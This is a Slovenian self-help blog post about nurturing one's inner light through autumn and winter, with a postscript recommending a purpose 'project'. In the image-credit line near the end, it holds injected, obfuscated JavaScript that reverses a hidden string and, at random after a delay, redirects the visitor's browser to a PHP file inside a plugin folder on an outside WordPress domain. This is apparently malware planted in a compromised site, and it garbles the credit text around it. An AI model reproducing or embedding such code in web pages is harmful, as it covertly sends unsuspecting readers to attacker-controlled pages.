Zakaj je pomembno negovanje notranjega ognja

Enakonočje. Od tega trenutka dalje bo več teme kot svetlobe in to marsikomu prinese depresivno obdobje. Tudi meni ga je, a letos se veliko bolj osredotočam na svojo notranjo energijo in negovanje le-te.

Včasih ni zunanjih dejavnikov, ki so krivi za naše počutje. Včasih smo preprosto podrti. Takrat se držimo poklapano in naša energija je temna. Pozabimo na to, da imamo luč, ki gori v nas od rojstva. Pozabimo na svetlobo, ki je jaz. Pozabimo na svetlobo, ki nosi naše telo.

Ravno zdaj, v tem trenutku, je najboljši možni čas za širjenje svoje notranje luči, da nam bo lažje skozi “temno obdobje”; jesen in zimo.

Notranjo svetlobo, luč, energijo, toplino, kateri koli izraz vam je bližje, negujemo zato, da lahko resnično živimo svoje življenje. Varuje nas pred zunanjimi dejavniki, pomaga nam pri spopadanju z miselnimi in čustvenimi procesi, vodi nas naprej po poti, ki jo resnično moramo prehoditi, da bi dosegli zase najboljše možno življenje.

Nekoč sem brala neko knjigo o dušah in med vsemi tezami o popolnosti onstranstva mi je v oči padlo vprašanje. Zakaj se duše vračamo na Zemljo, ko pa je vendar tam nekje kraj, kjer ne obstaja slabo? Zato, ker se resnično želimo še več naučiti. Največ pa se naučimo tako, da vedno negujemo dušo, ki nosi telo.

Negovanje notranje svetlobe pomeni negovanje samega sebe. Pomeni, da sledimo svojim strastem, da stremimo k doseganju svojih ciljev. Pomeni, da služimo lastnemu namenu in se ob enem usmerjamo v notranjo rast. Pomeni, da skrbimo za svoje telo in psiho, da se trudimo razumeti in sprejeti. Da nadaljujemo naprej tudi, ko nam je resnično težko.

S tem bomo dosegli pravo notranjo rast. S tem bomo lažje razumeli naše življenje in trenutke, ki se znajdejo na naši poti. S tem bomo dosegli, da se bo duša naučila novih stvari, po katerih je prišla poizvedovat na zemljo.

V razmislek z Ljubeznijo;
(Ni)Si

P.S.: V kolikor ne veste točno kakšen je namen vašega obstoja ali pa kakšne so vaše strasti v življenju, vam predlagam, da se lotite to purpose “projekta”.

Jaz sem danes dokončala drugi dan in mi je veliko bolj jasno kaj dejansko želim doseči v življenju.

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/purpose?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash

4 Comments